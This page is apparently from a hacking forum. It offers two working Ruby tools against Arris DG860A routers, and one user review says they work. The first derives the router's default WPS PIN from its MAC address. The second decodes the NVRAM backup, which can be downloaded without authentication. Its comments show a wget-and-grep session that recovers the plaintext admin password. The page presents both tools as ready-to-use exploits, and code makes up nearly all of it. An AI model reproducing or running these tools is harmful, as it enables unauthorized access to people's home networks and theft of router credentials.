ARRIS DG:86:0A WPS PIN Generator 1.0

Generate the default WPS PIN for the Arris Routers

Watchers:
This resource is being watched by 100 members.
  1. Mr. Penguin
    This is a ruby script that will generate the default WPS PIN for the Arris DG860A providing you know the HFC MAC address.

    Authored by Justin Oberdorf

    Code:
    Select All
    #!/usr/bin/ruby require 'optparse' def ComputeChecksum(s) accum = 0 s *= 10 accum += 3 * ((s / 10000000) % 10) accum += 1 * ((s / 1000000) % 10) accum += 3 * ((s / 100000) % 10) accum += 1 * ((s / 10000) % 10) accum += 3 * ((s / 1000) % 10) accum += 1 * ((s / 100) % 10) accum += 3 * ((s / 10) % 10) digit = (accum % 10) return (10 - digit) % 10 end def F(n) if n==1 or n==2 or n==0 return 1 end return F(n-1) + F(n-2) end def FibGen(num) return F(num); end def GenerateWPS(strMac) fibnum = Array.new(6) fibsum=0; seed=16 count=1 offset=0 counter=0 arrayMacs = strMac.split(":").map { |s| s.hex } tmp = arrayMacs.dup for i in 0..5 if tmp[i] > 30 while tmp[i] > 31 do tmp[i] -= 16 counter += 1 end end if counter == 0 if tmp[i] < 3 tmp[i] = tmp[0]+tmp[1]+tmp[2]+tmp[3]+tmp[4]+tmp[5]-tmp[i] if tmp[i] > 0xff tmp[i] = tmp[i] & 0xff end tmp[i] = (tmp[i]%28) + 3 end fibnum[i] = FibGen(tmp[i]) else fibnum[i] = FibGen(tmp[i])+FibGen(counter) end counter = 0 end for i in 0..5 fibsum += (fibnum[i]*FibGen(i+seed))+arrayMacs[i] end fibsum = fibsum%10000000 checksum = ComputeChecksum(fibsum) fibsum = (fibsum*10) + checksum return fibsum.to_s end if __FILE__ == $0 options = {} OptionParser.new do |opts| opts.banner = "Usage: arriswps.rb OPTIONS" opts.separator "" opts.separator "Options" opts.on('-m', '--mac 00:00:00:00:00:00', 'HFC MAC ADDRESS') { |v| options[:mac_address] = v } end.parse! raise OptionParser::MissingArgument if options[:mac_address].nil? puts GenerateWPS(options[:mac_address]) end
    This exploit lets your extract the ARRIS DG860A NVRAM backup where password information is stored in plain text.

    Code:
    Select All
    #! /usr/bin/env ruby # ARRIS DG860A NVRAM Backup 'Compressor/Decompressor', it really does xor? # Gleaned from sc_mix executable in firmware dump. # # Backup file is world readable without authentication and contains password # information in plain text. # # box:arris-dev cosmo$ wget http://192.168.0.1/router.data # --2013-10-17 18:21:28-- http://192.168.0.1/router.data # Connecting to 192.168.0.1:80... connected. # HTTP request sent, awaiting response... 200 OK # Length: 3518 (3.4K) [application/octet-stream] # Saving to: ‘router.data’ # # 100%[=============================================================================================================>] 3,518 --.-K/s in 0s # # 2013-10-17 18:21:28 (108 MB/s) - ‘router.data’ saved [3518/3518] # # box:arris-dev cosmo$ tar vxf router.data # x backup/ # x backup/sc_nvram.usr.sc # x backup/sc_nvram.sc # box:arris-dev cosmo$ sudo ./sc_mix.rb -u -s backup/sc_nvram.usr.sc -d sc_nvram_dump # Password: # box:arris-dev cosmo$ cat sc_nvram_dump | tr "\000\000" "\000" | tr "\000" "\n" | grep sysAdminPassword # sysAdminPassword[0]=test123 # box:arris-dev cosmo$ # # # require 'optparse' require 'highline/import' require 'zlib' def Compress(infile, outfile) instream = nil outstream = nil size = 0 calculatedcrc = 0 data='' size = File.size?(infile) instream = File.open(infile,'r') data = instream.read() data = data.bytes.map { |a| a ^ 0xFFFFFFAA }.pack('c*') instream.close() if !instream.nil? outstream = File.open(outfile,'w') outstream.write("\x00NOF") outstream.write([size].pack('L>')) calculatedcrc = Zlib::crc32(data) outstream.write([calculatedcrc].pack('L>')) outstream.write([size].pack('L>')) outstream.write("\x00\x00\x00\x00" * 6) outstream.write(data) outstream.close() if !outstream.nil? end def Decompress(infile, outfile) instream = nil outstream = nil size = 0 embeddedcrc = 0 calculatedcrc = 0 data='' if !(File::size?(infile) >= 0x28) puts "[ERROR]: Source file size is insufficient(Smaller then 0x28 bytes)" exit end instream = File::open(infile,'r') if instream.read(4) != "\x00NOF" instream.close() if !instream.nil? puts "[ERROR]: Source file contains invalid magic(\\x00NOF)" exit end size = instream.read(4).unpack("L>")[0] embeddedcrc = instream.read(4).unpack("L>")[0] if !(File.size?(infile) >= (0x28+size)) puts "[ERROR]: Source file size if insufficient(Smaller then 0x" + (0x28+minsize).to_s(16) + ")" instream.close() if !instream.nil? end instream.seek(0x28,IO::SEEK_SET) data = instream.read(size) calculatedcrc = Zlib::crc32(data) if embeddedcrc != calculatedcrc puts "[ERROR]: Checksum mismatch" instream.close() if !instream.nil? exit end outstream = File::open(outfile,'w') outstream.write(data.bytes.map { |a| a ^ 0xFFFFFFAA }.pack('c*')) instream.close() if !instream.nil? outstream.close() if !outstream.nil? end #begin if __FILE__ == $0 options = {} opt_parser = OptionParser.new do |opts| opts.banner = "Usage: sc_mix.rb -s <Src_PATH> -d <Dest_PATH>" opts.separator "Usage:" opts.on('-s', '--source Src_PATH', 'Source File') { |v| options[:source_file] = v } opts.on('-d', '--destination Dest_PATH', 'Destination File') { |v| options[:destination_file] = v } opts.on('-u', 'Uncompress') { options[:uncompress] = true } opts.on_tail("-h", "Show this message") do puts opts exit end end opt_parser.parse! if options[:source_file].nil? or options[:destination_file].nil? puts opt_parser exit end if !File::exists?(options[:source_file]) or !File::readable?(options[:source_file]) puts "[ERROR]: File does not exist or there are insufficient privileges(sudo?)" exit end if File::exists?(options[:destination_file]) if !agree("[ERROR]: File exists attempt to overwrite[yes/no]? ") exit end if !File::writable?(options[:destination_file]) puts "[ERROR]: File is not writeable is there insufficient privileges(sudo?)" exit end end if !options[:uncompress] puts "[WARNING]: Compression is currently beta" Compress(options[:source_file], options[:destination_file]) else Decompress(options[:source_file], options[:destination_file]) end end

Recent Reviews

  1. jp llamas
    jp llamas
    5/5,
    Version: 1.0
    works as described.. thanks for the hard work